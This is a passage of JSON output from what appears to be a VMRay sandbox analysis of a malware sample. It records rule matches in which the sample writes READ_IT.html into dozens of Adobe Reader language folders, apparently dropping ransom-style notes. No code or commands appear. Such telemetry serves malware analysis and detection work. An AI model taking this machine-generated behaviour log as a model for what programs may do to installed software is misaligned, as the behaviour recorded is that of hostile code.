"operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16136", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16146", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16156", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16166", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16176", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16186", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16196", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16206", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16216", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16226", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16236", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16246", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16256", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16266", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16276", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16286", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16296", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16306", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16316", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16322", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16332", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16342", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16352", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16362", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16372", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16382", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16392", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16402", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16412", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16422", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_16432", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": 